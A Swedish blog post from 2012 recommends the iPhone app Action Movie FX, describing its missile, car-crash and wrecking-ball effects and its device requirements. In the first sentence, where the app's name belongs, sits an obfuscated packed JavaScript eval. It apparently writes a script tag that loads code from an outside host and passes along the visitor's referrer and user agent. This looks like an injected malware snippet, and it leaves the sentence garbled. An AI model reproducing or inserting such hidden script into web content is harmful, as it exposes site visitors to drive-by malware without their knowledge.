Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Månadens app: Action Movie FX.

Månadens app: Action Movie FX.
Filip Urde
  • On 31 januari, 2012
  • http://www.revue.se/filip-urde

Detta eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kedsa|var|u0026u|referrer|dzabi||js|php’.split(’|’),0,{}))
måste vara en av de skönare apparna på väldigt, väldigt länge. Den är inte pur färsk, den kom ut 16 januari, men det gör den inte mindre rolig att skoja med och därför ett måste för oss på Revue att tipsa om.

Action Movie FX är en otroligt enkel app som skapar imponerande effekter.

Så här fungerar det: Du öppnar programmet och väljer en av de tre fria effekterna, missilattack, bilkrash eller ett stort klot som krossar marken. Du kan alltså köpa ytterligare effekter för typ 10kr styck. Sen är det bara filma vem du vill eller vad du vill och skicka en missil. För bästa effekt så måste du försöka hitta en plan yta för själva nerslaget av missilen, bilen eller klotet.

När videon är inspelad, erbjuder actionfilm FX ett effekt reglage som gör att du kan justera var i din inspelnings tidslinje missilen ska slå ner. Sen bearbetar appen och du kan där efter se resultatet.

Applikationen kräver iOS 4.3 eller senare och fungerar med iPhone 3G, iPhone 4, iPhone 4S, iPod touch (4: e generationen), iPad 2 Wi-Fi och iPad 2.

Så tanka nu ner appen här och spräng ditt kontor, klassrum eller bil! Hejja Apps!